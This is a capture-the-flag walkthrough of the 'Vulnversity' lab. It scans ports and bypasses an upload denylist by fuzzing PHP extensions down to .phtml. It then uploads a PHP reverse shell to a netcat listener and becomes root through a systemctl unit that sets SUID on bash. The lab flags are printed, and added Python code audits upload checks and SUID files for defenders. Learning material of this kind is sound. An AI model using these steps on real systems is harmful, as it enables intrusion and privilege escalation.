Vulnversity

Reconnaissance

As usual, we start by scanning the target with nmap:

└──╼ $sudo nmap -sS -sV -sC -T4 --min-rate 5000 10.10.14.231 -vv
...
Discovered open port 21/tcp on 10.10.14.231
Discovered open port 445/tcp on 10.10.14.231
Discovered open port 22/tcp on 10.10.14.231
Discovered open port 139/tcp on 10.10.14.231
Discovered open port 3128/tcp on 10.10.14.231
Discovered open port 3333/tcp on 10.10.14.231
Completed SYN Stealth Scan at 22:29, 0.67s elapsed (1000 total ports)
Initiating Service scan at 22:29
Scanning 6 services on 10.10.14.231
Completed Service scan at 22:29, 22.16s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.14.231.
NSE: Starting runlevel 1 (of 3) scan.
...
Scanned at 2023-10-13 22:29:11 EDT for 30s
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     REASON         VERSION
21/tcp   open  ftp         syn-ack ttl 63 vsftpd 3.0.3
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a4ffcb8c8761cb5851cacb286411c5a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYQExoU9R0VCGoQW6bOwg0U7ILtmfBQ3x/rdK8uuSM/fEH80hgG81Xpqu52siXQXOn1hpppYs7rpZN+KdwAYYDmnxSPVwkj2yXT9hJ/fFAmge3vk0Gt5Kd8q3CdcLjgMcc8V4b8v6UpYemIgWFOkYTzji7ZPrTNlo4HbDgY5/F9evC9VaWgfnyiasyAT6aio4hecn0Sg1Ag35NTGnbgrMmDqk6hfxIBqjqyYLPgJ4V1QrqeqMrvyc6k1/XgsR7dlugmqXyICiXu03zz7lNUf6vuWT707yDi9wEdLE6Hmah78f+xDYUP7iNA0raxi2H++XQjktPqjKGQzJHemtPY5bn
|   256 ac9dec44610c28850088e968e9d0cb3d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHCK2yd1f39AlLoIZFsvpSlRlzyO1wjBoVy8NvMp4/6Db2TJNwcUNNFjYQRd5EhxNnP+oLvOTofBlF/n0ms6SwE=
|   256 3050cb705a865722cb52d93634dca558 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGqh93OTpuL32KRVEn9zL/Ybk+5mAsT/81axilYUUvUB
139/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  syn-ack ttl 63 Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 43130/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 39828/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 53476/udp): CLEAN (Failed to receive data)
|   Check 4 (port 49708/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2023-10-13T22:29:38-04:00
|_clock-skew: mean: 1h20m02s, deviation: 2h18m34s, median: 2s
| smb2-time: 
|   date: 2023-10-14T02:29:37
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   VULNUNIVERSITY<00>   Flags: <unique><active>
|   VULNUNIVERSITY<03>   Flags: <unique><active>
|   VULNUNIVERSITY<20>   Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   0000000000000000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000
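Added example (my code, not part of the original writeup): a small Python parser for the port table in the nmap -sV -vv output above, so the open-port count, services and version banners can be pulled into an inventory instead of being read by eye. The sample text is constructed from the rows shown above and assumes -vv output (REASON column present).

```python
import re

# Constructed sample: port rows taken from the nmap -sV -vv output in this writeup,
# with one NSE script line kept to show that such lines are skipped.
NMAP_OUTPUT = """\
PORT     STATE SERVICE     REASON         VERSION
21/tcp   open  ftp         syn-ack ttl 63 vsftpd 3.0.3
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  syn-ack ttl 63 Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
3333/tcp open  http        syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
"""

# One port row: "PORT/PROTO STATE SERVICE REASON [ttl N] VERSION...".
# Assumes -vv output; without -vv the REASON column is absent and this regex would misalign.
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"\s+(?P<reason>\S+)(?:\s+ttl\s+\d+)?\s*(?P<version>.*)$"
)

def parse_ports(output):
    """Return one dict per port row; NSE lines (starting with '|') never match."""
    rows = []
    for line in output.splitlines():
        m = PORT_RE.match(line)
        if m:
            row = m.groupdict()
            row["port"] = int(row["port"])
            rows.append(row)
    return rows

def open_ports(output):
    """Port numbers in state 'open', in scan order."""
    return [r["port"] for r in parse_ports(output) if r["state"] == "open"]

def version_of(output, service):
    """First dotted version number in the banner of the named service, or None."""
    for r in parse_ports(output):
        if r["service"] == service:
            m = re.search(r"\d+(?:\.\d+)+", r["version"])
            return m.group(0) if m else None
    return None

def inventory(output):
    """{port: (service, banner)} for open ports: the list to diff against expected exposure."""
    return {r["port"]: (r["service"], r["version"].strip())
            for r in parse_ports(output) if r["state"] == "open"}
```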

Answers

  • Scan the box; how many ports are open?
    6

  • What version of the squid proxy is running on the machine?
    3.5.12

  • How many ports will Nmap scan if the flag -p-400 was used?
    400

  • What is the most likely operating system this machine is running?
    Ubuntu

  • What port is the web server running on?
    3333

  • What is the flag for enabling verbose mode using Nmap?
    -v

Locating directories using Gobuster

  • What is the directory that has an upload form page?
    /internal/

Compromise the Webserver

  • What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
    .php
Create a wordlist of PHP extensions to fuzz with:

nano phpext.txt
.php
.php3
.php4
.php5
.phtml

In Burp Intruder, find the filename in the captured upload request and mark the extension with § as the payload position, so that Intruder tries every extension defined in the file.

Load phpext.txt into Burp Suite as the payload list.

  • Run this attack, what extension is allowed?
    .phtml
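Added example (my code, not from the original writeup): the upload check on this box is a denylist that refuses ".php" but lets ".phtml" through, which the server still executes as PHP, as the reverse shell in this walkthrough shows. Below, that weak denylist sits beside a hardened allowlist check; the allowed set is a hypothetical one for an image-only upload form, and the phpext.txt list from above is run through both.

```python
import os
import re

# Weak pattern from the walkthrough: block the one extension the developer thought of.
DENIED = {".php"}
# Hardened pattern (hypothetical allowlist for an image-upload form): accept only these.
ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")   # no dots, so no second extension

# The extension list from phpext.txt above, used to compare the two checks.
PHP_EXTENSIONS = [".php", ".php3", ".php4", ".php5", ".phtml"]

def denylist_check(filename):
    """Weak: accepts anything whose final extension is not exactly '.php'."""
    _, ext = os.path.splitext(filename)
    if ext.lower() in DENIED:
        return False, "extension is blocked"
    return True, "ok"

def allowlist_check(filename):
    """Hardened: accept only a bare name with a single, explicitly allowed extension."""
    if os.path.basename(filename) != filename:
        return False, "path separators are not allowed"
    stem, ext = os.path.splitext(filename)
    if ext.lower() not in ALLOWED:
        return False, "extension %r is not in the allowlist" % ext
    if not SAFE_STEM.match(stem):
        return False, "unsafe characters or a second extension in the name"
    return True, "ok"

def accepted_php_extensions(check):
    """Run the phpext.txt list through a check, as Intruder did, and report what passes."""
    return [ext for ext in PHP_EXTENSIONS if check("shell" + ext)[0]]
```

Serving uploads from a directory where the PHP handler is disabled is the second layer; the allowlist alone only stops the extension trick.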

Edit the reverse shell. If you don't have it on your machine, download it from GitHub; I'm using Parrot OS, which has the script saved at /usr/share/webshells/php/php-reverse-shell.php.

Edit the IP address and, if needed, the port number, and make sure you rename the file to .phtml. Then upload the file to the server.

Set up a netcat listener on our machine.

Upgrading the shell (not required)

Answers

  • What is the name of the user who manages the webserver?
    bill

  • What is the user flag?
    8bd7992fbe8a6ad22a63361004cfcedb

Privilege Escalation

Searching for SUID files on the system:

find / -user root -perm -4000 2>/dev/null -exec ls -ldn {} \;

Go to GTFOBins, search for systemctl, and adapt the listed commands as follows:

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod u+s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Paste it into the terminal and run /bin/bash -p.
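Added example (my code, not from the original writeup) for the defender side of this step: an audit of the `find ... -exec ls -ldn` listing above against a baseline of expected SUID-root files and a subset of the GTFOBins SUID list, which flags both the SUID systemctl this box ships with and the SUID bash the unit file leaves behind. The listing and the baseline are constructed sample data.

```python
import os

# Constructed sample of `find / -user root -perm -4000 -exec ls -ldn {} \;` output.
# The last two lines are the ones an admin of this box should act on.
SUID_LISTING = """\
-rwsr-xr-x 1 0 0 54256 Mar 26 2019 /usr/bin/passwd
-rwsr-xr-x 1 0 0 40432 Mar 26 2019 /bin/su
-rwsr-xr-x 1 0 0 44680 May 7 2014 /bin/ping
-rwsr-xr-x 1 0 0 136808 Jan 31 2020 /usr/bin/sudo
-rwsr-xr-x 1 0 0 659856 Apr 5 2019 /bin/systemctl
-rwsr-xr-x 1 0 0 1037528 Jul 12 2019 /bin/bash
"""

# Hypothetical baseline: SUID-root files this host is expected to carry. In practice,
# record it from a freshly built host and keep it under version control.
BASELINE = {"/usr/bin/passwd", "/bin/su", "/bin/ping", "/usr/bin/sudo",
            "/bin/mount", "/bin/umount", "/usr/bin/chsh", "/usr/bin/newgrp"}

# Subset of binaries whose SUID-root bit yields a shell or file write (GTFOBins, SUID section).
KNOWN_ABUSABLE = {"systemctl", "bash", "sh", "find", "vim", "python",
                  "env", "cp", "tee", "nmap", "less", "awk", "perl"}

def parse_listing(listing):
    """Return (mode, uid, path) per `ls -ldn` line; paths with spaces are not handled."""
    rows = []
    for line in listing.splitlines():
        fields = line.split()
        if len(fields) >= 9 and fields[0][3] in "sS":   # SUID bit in the owner triad
            rows.append((fields[0], int(fields[2]), fields[-1]))
    return rows

def audit_suid(listing, baseline=BASELINE):
    """Label each SUID file 'abusable', 'unexpected' (not in baseline) or 'baseline'."""
    report = {}
    for mode, uid, path in parse_listing(listing):
        name = os.path.basename(path)
        if name in KNOWN_ABUSABLE:
            report[path] = "abusable"
        elif path not in baseline:
            report[path] = "unexpected"
        else:
            report[path] = "baseline"
    return report

def findings(listing):
    """Paths an admin should act on, in listing order."""
    return [p for p, label in audit_suid(listing).items() if label != "baseline"]
```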

Answers

  • On the system, search for all SUID files. Which file stands out?
    /bin/systemctl

  • Become root and get the last flag (/root/root.txt)
    a58ff8579f0a9270368d33a9966c7fd5